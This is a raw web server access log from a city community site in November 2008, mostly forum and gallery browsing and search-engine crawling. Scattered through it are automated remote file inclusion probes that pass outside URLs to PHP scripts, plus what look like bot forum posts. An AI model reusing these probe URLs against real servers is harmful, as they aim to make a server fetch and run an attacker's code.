195.113.173.139 - - [15/Nov/2008:05:10:05 -0800] "GET /logs/access_080921.log/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.805" "www.sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:05 -0800] "GET /forum2/jscripts/ipb_blogxml.js HTTP/1.1" 200 25369 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:07 -0800] "GET /forum2/style_images/red_crysta/loading_anim.gif HTTP/1.1" 200 2800 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:07 -0800] "GET /forum2/style_images/red_crysta/close.png HTTP/1.1" 200 834 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:07 -0800] "GET /forum2/blog/dheader_red_crysta_1.png HTTP/1.1" 200 14240 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:07 -0800] "GET /forum2/style_images/red_crysta/tile_sub.gif HTTP/1.1" 200 1581 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:07 -0800] "GET /forum2/style_images/red_crysta/login-button.gif HTTP/1.1" 200 1226 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:07 -0800] "GET /forum2/style_images/red_crysta/tile_back.gif HTTP/1.1" 200 940 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:07 -0800] "GET /forum2/jscripts/ipb_topic.js HTTP/1.1" 200 14082 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:07 -0800] "GET /forum2/style_images/red_crysta/nav.gif HTTP/1.1" 200 113 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:07 -0800] "GET /forum2/style_images/red_crysta/tile_sub-lite.gif HTTP/1.1" 200 1511 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:09 -0800] "GET /forum2/style_images/red_crysta/e_pub.gif HTTP/1.1" 200 78 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:09 -0800] "GET /forum2/style_images/red_crysta/to_post_off.gif HTTP/1.1" 200 64 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:09 -0800] "GET /forum2/uploads/1182562075/tn_gallery_2_13_15480.jpg HTTP/1.1" 200 3460 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:09 -0800] "GET /forum2/style_images/red_crysta/t_slideshow.gif HTTP/1.1" 200 2176 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:09 -0800] "GET /forum2/uploads/1182562075/tn_gallery_2_13_28679.jpg HTTP/1.1" 200 3832 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:05:10:09 -0800] "GET /picgallery/thumbnails.php?album=toprated&cat=0&page=3 HTTP/1.0" 200 16194 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:09 -0800] "GET /forum2/uploads/1182562075/tn_gallery_2_13_41128.jpg HTTP/1.1" 200 4195 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:10 -0800] "GET /forum2/uploads/1182562075/tn_gallery_2_13_7807.jpg HTTP/1.1" 200 3559 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:10 -0800] "GET /forum2/uploads/1182562075/tn_gallery_2_13_54288.jpg HTTP/1.1" 200 3698 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:10 -0800] "GET /forum2/uploads/1182562075/tn_gallery_2_13_25501.jpg HTTP/1.1" 200 4230 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:10 -0800] "GET /forum2/index.php?s=599562158fb918cee7ab8827d6710683&act=task HTTP/1.1" 200 61 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:11 -0800] "GET /forum2/style_images/red_crysta/tile_cat.gif HTTP/1.1" 200 2760 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:11 -0800] "GET /forum2/style_images/red_crysta/img_larger.gif HTTP/1.1" 200 54 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:12 -0800] "GET /favicon.ico HTTP/1.1" 404 739 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:15 -0800] "GET /favicon.ico HTTP/1.1" 404 739 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:18 -0800] "GET /forum2/index.php?automodule=gallery&req=si&img=178 HTTP/1.1" 200 21876 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=1&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:19 -0800] "GET /forum2/favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:19 -0800] "GET /forum2/style_images/red_crysta/folder_editor_images/css_rte.css HTTP/1.1" 200 4313 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:21 -0800] "GET /forum2/style_images/2_2_sccilogobluebkgrd.gif HTTP/1.1" 200 8834 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:22 -0800] "GET /forum2/jscripts/ipb_galleryjs.js HTTP/1.1" 200 7039 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:23 -0800] "GET /forum2/style_images/red_crysta/exp_minus.gif HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:23 -0800] "GET /forum2/style_images/red_crysta/exp_plus.gif HTTP/1.1" 200 61 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:24 -0800] "GET /forum2/style_images/red_crysta/rigt_image.gif HTTP/1.1" 200 87 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:24 -0800] "GET /forum2/uploads/1182562075/med_gallery_2_13_25501.jpg HTTP/1.1" 200 28694 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:24 -0800] "GET /forum2/style_images/red_crysta/nav_m.gif HTTP/1.1" 200 53 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:24 -0800] "GET /forum2/jscripts/ips_text_editor_lite.js HTTP/1.1" 200 9928 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:24 -0800] "GET /forum2/style_images/red_crysta/folder_profile_portal/user-offline.png HTTP/1.1" 200 569 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:24 -0800] "GET /forum2/style_images/red_crysta/spacer.gif HTTP/1.1" 200 43 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:24 -0800] "GET /forum2/uploads/photo-152.gif HTTP/1.1" 404 756 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:25 -0800] "GET /forum2/style_images/red_crysta/rating_5_mini.gif HTTP/1.1" 200 1005 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:25 -0800] "GET /forum2/style_images/red_crysta/folder_profile_portal/gender_male.png HTTP/1.1" 200 692 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:25 -0800] "GET /forum2/style_images/red_crysta/folder_profile_portal/find_posts.png HTTP/1.1" 200 677 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:26 -0800] "GET /forum2/style_images/red_crysta/p_mq_add.gif HTTP/1.1" 200 1633 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:26 -0800] "GET /forum2/style_images/red_crysta/pip.gif HTTP/1.1" 200 125 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:26 -0800] "GET /forum2/style_images/red_crysta/p_up.gif HTTP/1.1" 200 1402 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:26 -0800] "GET /forum2/style_images/red_crysta/p_quote.gif HTTP/1.1" 200 1516 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:26 -0800] "GET /forum2/index.php?act=task HTTP/1.1" 200 61 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:27 -0800] "GET /forum2/style_images/red_crysta/rss.png HTTP/1.1" 200 1090 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
121.54.27.122 - - [15/Nov/2008:05:10:29 -0800] "GET /forum2/style_images/red_crysta/img-resized.png HTTP/1.1" 200 677 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=178" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
203.114.112.155 - - [15/Nov/2008:05:10:30 -0800] "GET /logs/access_081009.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.keoeeit.com/go/arab.txt? HTTP/1.1" 404 797 "-" "libwww-perl/5.803" "www.sancarloscity.org"
89.149.241.165 - - [15/Nov/2008:05:10:48 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
89.149.241.165 - - [15/Nov/2008:05:10:48 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=e189a61852f96ef7a44792e7643d0b1b HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=e189a61852f96ef7a44792e7643d0b1b" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
89.149.241.165 - - [15/Nov/2008:05:10:50 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=e189a61852f96ef7a44792e7643d0b1b" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
89.149.241.165 - - [15/Nov/2008:05:10:50 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=e189a61852f96ef7a44792e7643d0b1b HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=e189a61852f96ef7a44792e7643d0b1b" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
89.149.241.165 - - [15/Nov/2008:05:11:02 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=e189a61852f96ef7a44792e7643d0b1b" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
89.149.241.165 - - [15/Nov/2008:05:11:03 -0800] "GET /jodera2/viewtopic.php?p=42463 HTTP/1.0" 200 31271 "http://www.sancarloscity.org/viewtopic.php?p=42463#42463" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2" "www.sancarloscity.org"
208.111.154.16 - - [15/Nov/2008:05:11:12 -0800] "GET /picgallery/thumbnails.php?album=18&page=1&sort=td HTTP/1.1" 200 16740 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
211.43.208.24 - - [15/Nov/2008:05:11:35 -0800] "GET /logs/access_081002.log//skin/zero_vote/ask_password.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 791 "-" "Mozilla/5.0" "www.sancarloscity.org"
211.43.208.24 - - [15/Nov/2008:05:11:35 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 773 "-" "Mozilla/5.0" "www.sancarloscity.org"
211.43.208.24 - - [15/Nov/2008:05:11:35 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 767 "-" "Mozilla/5.0" "www.sancarloscity.org"
211.43.208.24 - - [15/Nov/2008:05:11:40 -0800] "GET /logs/access_081007.log//skin/zero_vote/ask_password.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 791 "-" "Mozilla/5.0" "www.sancarloscity.org"
208.111.154.16 - - [15/Nov/2008:05:11:53 -0800] "GET /picgallery/thumbnails.php?album=toprated&cat=0&page=10 HTTP/1.1" 200 16228 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
89.149.202.60 - - [15/Nov/2008:05:13:01 -0800] "GET /jodera2/posting.php?mode=reply&t=32687 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32687" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.8) Gecko/20050418 Firefox/1.0.4" "www.sancarloscity.org"
89.149.202.60 - - [15/Nov/2008:05:13:02 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=32687&sid=63dcab951f0fd40542d0556cfe857f85 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32687&sid=63dcab951f0fd40542d0556cfe857f85" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.8) Gecko/20050418 Firefox/1.0.4" "www.sancarloscity.org"
89.149.202.60 - - [15/Nov/2008:05:13:04 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32687&sid=63dcab951f0fd40542d0556cfe857f85" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.8) Gecko/20050418 Firefox/1.0.4" "www.sancarloscity.org"
89.149.202.60 - - [15/Nov/2008:05:13:05 -0800] "GET /jodera2/posting.php?mode=reply&t=32687&sid=63dcab951f0fd40542d0556cfe857f85 HTTP/1.0" 200 50586 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32687&sid=63dcab951f0fd40542d0556cfe857f85" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.8) Gecko/20050418 Firefox/1.0.4" "www.sancarloscity.org"
89.149.202.60 - - [15/Nov/2008:05:13:23 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32687&sid=63dcab951f0fd40542d0556cfe857f85" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.8) Gecko/20050418 Firefox/1.0.4" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:05:13:23 -0800] "GET /forum2/index.php?act=calendar&cal_id=1&code=showweek&week=1227398400 HTTP/1.0" 200 28167 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
89.149.202.60 - - [15/Nov/2008:05:13:24 -0800] "GET /jodera2/viewtopic.php?p=42464 HTTP/1.0" 200 81341 "http://www.sancarloscity.org/viewtopic.php?p=42464#42464" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.8) Gecko/20050418 Firefox/1.0.4" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:30 -0800] "GET /jodera2/viewtopic.php?p=40785 HTTP/1.1" 200 82753 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:30 -0800] "GET /jodera2/profile.php?mode=viewprofile&u=17&sid=33bfc481b67eb5b6e0455e78aa86a029 HTTP/1.1" 200 21449 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:31 -0800] "GET /jodera2/viewtopic.php?t=26383&start=0&postdays=0&postorder=asc&highlight=&sid=cfc81ab7be635ec08a52184f90eaadc2 HTTP/1.1" 200 33052 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:32 -0800] "GET /jodera2/search.php?sid=cfc81ab7be635ec08a52184f90eaadc2 HTTP/1.1" 200 24441 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:32 -0800] "GET /jodera2/viewtopic.php?t=32634&sid=6b695e6094e33be444de52267287ea08 HTTP/1.1" 200 33194 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:33 -0800] "GET /jodera2/viewtopic.php?p=42336&sid=6b695e6094e33be444de52267287ea08 HTTP/1.1" 200 82116 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:33 -0800] "GET /jodera2/viewtopic.php?p=42394&sid=6b695e6094e33be444de52267287ea08 HTTP/1.1" 200 25762 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:34 -0800] "GET /jodera2/viewtopic.php?t=32595&sid=6b695e6094e33be444de52267287ea08 HTTP/1.1" 200 84763 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:34 -0800] "GET /jodera2/viewtopic.php?t=32622&sid=6b695e6094e33be444de52267287ea08 HTTP/1.1" 200 38421 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:35 -0800] "GET /jodera2/viewtopic.php?t=32576&sid=6b695e6094e33be444de52267287ea08 HTTP/1.1" 200 33018 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:36 -0800] "GET /jodera2/viewtopic.php?p=32604 HTTP/1.1" 200 82673 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:37 -0800] "GET /jodera2/profile.php?mode=viewprofile&u=12&sid=f297053a92e043a5231ca43c81e9a59b HTTP/1.1" 200 21489 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
195.98.246.153 - - [15/Nov/2008:05:13:37 -0800] "GET /logs/access_081013.log/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.65" "www.sancarloscity.org"
195.98.246.153 - - [15/Nov/2008:05:13:37 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 759 "-" "libwww-perl/5.65" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:38 -0800] "GET /jodera2/viewtopic.php?t=32619&sid=6b695e6094e33be444de52267287ea08 HTTP/1.1" 200 84308 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:13:39 -0800] "GET /jodera2/profile.php?mode=register&sid=eb472236b4997fb4a27a37df04671410 HTTP/1.1" 200 15283 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
195.98.246.153 - - [15/Nov/2008:05:13:40 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 764 "-" "libwww-perl/5.65" "www.sancarloscity.org"
195.113.173.139 - - [15/Nov/2008:05:13:45 -0800] "GET /logs/access_080921.log/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.805" "www.sancarloscity.org"
195.113.173.139 - - [15/Nov/2008:05:13:45 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 759 "-" "libwww-perl/5.805" "www.sancarloscity.org"
195.113.173.139 - - [15/Nov/2008:05:13:45 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 764 "-" "libwww-perl/5.805" "www.sancarloscity.org"
